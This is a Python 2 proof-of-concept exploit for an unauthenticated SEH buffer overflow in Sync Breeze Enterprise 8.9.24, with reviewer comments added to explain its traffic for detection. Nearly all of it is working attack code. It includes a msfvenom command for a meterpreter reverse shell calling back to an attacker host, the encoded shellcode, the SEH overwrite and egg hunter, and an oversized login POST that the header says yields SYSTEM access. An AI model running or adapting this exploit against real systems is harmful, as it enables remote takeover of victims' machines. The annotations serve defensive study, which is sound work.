#!/usr/bin/python
# NOTE(review): Python 2 script (print statements; `b""` is a plain str, which is
# why `buf` can be appended to `evil` below). It is the author's proof of concept
# for the SEH overflow described in the header. The comments added below only
# describe what the script builds, so the traffic it produces can be recognised
# and the affected configuration (named in the author's comments) identified.
print "Sync Breeze Enterprise 8.9.24 Buffer Overflow Exploit"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Greetings to ozzie_offsec and carbonated
import socket
import sys
# Blocking TCP connection to the hard-coded target on port 81 (the same host is
# repeated in the Host header further down). socket.connect() returns None, so
# `connect` is never used afterwards; `sys` is imported but not used either.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('10.12.1.124',81))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.2.1 LPORT=1234 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
# `buf` is the encoded payload produced by the msfvenom command quoted above
# (a reverse_tcp connection back to that command's LHOST/LPORT, encoded to
# avoid the bad characters listed above). The bytes are opaque here; the size
# figure is the author's comment and is not recomputed from the literal — use
# len(buf) if the exact length matters.
buf = b""
buf += b"\xda\xc0\xb8\xa6\x6f\x32\xf2\xd9\x74\x24\xf4\x5b\x33"
buf += b"\xc9\xb1\x47\x31\x43\x1a\x03\x43\x1a\x83\xeb\xfc\xe2"
buf += b"\x53\x93\xda\x70\x9b\x6c\x1b\x15\x12\x89\x2a\x15\x40"
buf += b"\xd9\x1d\xa5\x03\x8f\x91\x4e\x41\x24\x21\x22\x4d\x4b"
buf += b"\x82\x89\xab\x62\x13\xa1\x8f\xe5\x97\xb8\xc3\xc5\xa6"
buf += b"\x72\x16\x07\xee\x6f\xda\x55\xa7\xe4\x48\x4a\xcc\xb1"
buf += b"\x50\xe1\x9e\x54\xd0\x16\x56\x56\xf1\x88\xec\x01\xd1"
buf += b"\x2b\x20\x3a\x58\x34\x25\x07\x13\xcf\x9d\xf3\xa2\x19"
buf += b"\xec\xfc\x08\x64\xc0\x0e\x51\xa0\xe7\xf0\x24\xd8\x1b"
buf += b"\x8c\x3e\x1f\x61\x4a\xcb\x84\xc1\x19\x6b\x61\xf3\xce"
buf += b"\xed\xe2\xff\xbb\x7a\xac\xe3\x3a\xaf\xc6\x18\xb6\x4e"
buf += b"\x09\xa9\x8c\x74\x8d\xf1\x57\x15\x94\x5f\x39\x2a\xc6"
buf += b"\x3f\xe6\x8e\x8c\xd2\xf3\xa3\xce\xba\x30\x89\xf0\x3a"
buf += b"\x5f\x9a\x83\x08\xc0\x30\x0c\x21\x89\x9e\xcb\x30\x9d"
buf += b"\x21\x03\xfa\xce\xdc\xa4\xfb\xc7\x1a\xf0\xab\x7f\x8b"
buf += b"\x79\x20\x80\x34\xac\xdd\x8a\xa2\xe3\x32\x89\x33\x94"
buf += b"\x30\x8d\x37\xb6\xbc\x6b\x67\x66\xef\x23\xc7\xd6\x4f"
buf += b"\x94\xaf\x3c\x40\xcb\xcf\x3e\x8a\x64\x65\xd1\x63\xdc"
buf += b"\x11\x48\x2e\x96\x80\x95\xe4\xd2\x82\x1e\x0b\x22\x4c"
buf += b"\xd7\x66\x30\x38\x17\x3d\x6a\xee\x28\xeb\x01\x0e\xbd"
buf += b"\x10\x80\x59\x29\x1b\xf5\xad\xf6\xe4\xd0\xa6\x3f\x71"
buf += b"\x9b\xd0\x3f\x95\x1b\x20\x16\xff\x1b\x48\xce\x5b\x48"
buf += b"\x6d\x11\x76\xfc\x3e\x84\x79\x55\x93\x0f\x12\x5b\xca"
buf += b"\x78\xbd\xa4\x39\x79\x81\x72\x07\x0f\xeb\x46"
#pop pop ret 10030991
# SEH overwrite pair. `seh` is the address noted above (0x10030991) written in
# little-endian byte order; `nseh` is two NOPs followed by EB 0B, an x86 short
# jump forward, i.e. the classic next-SEH / SEH layout. A pop/pop/ret address
# in a module that is not rebased is what makes this work without ASLR on the
# configuration the author lists.
nseh = "\x90\x90\xEB\x0B"
seh = "\x91\x09\x03\x10"
# Egg hunter stub. The bytes \x77\x30\x30\x74 inside it spell "w00t", the tag
# that is placed in front of `buf` further down ("w00tw00t"); as the name says,
# it presumably searches memory for that tag — not verified here beyond the
# matching bytes.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# HTTP POST to /login. Detection note: the declared Content-Length (17000) does
# not match what is actually sent — the body assembled below is roughly 21 KB,
# almost all of it repeated single-byte filler (0x41, 0x42, 0x90) following the
# password field. The request is never completed by reading a response.
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 10.12.1.124\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 12290 #subtract/add for payload
# Body layout after the form fields, as the author arranged it (the offsets are
# the author's; "adjust '\x41'" in the header comment refers to the filler above):
#   "w00tw00t" tag + NOP sled + encoded payload + NOP sled   <- what the egg hunter looks for
#   0x42 filler + nSEH + SEH                                  <- the handler overwrite
#   NOP sled + egg hunter + trailing NOP padding
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1614
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000
# Single send() of the whole buffer, then close; nothing is read back and no
# error handling is attempted.
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()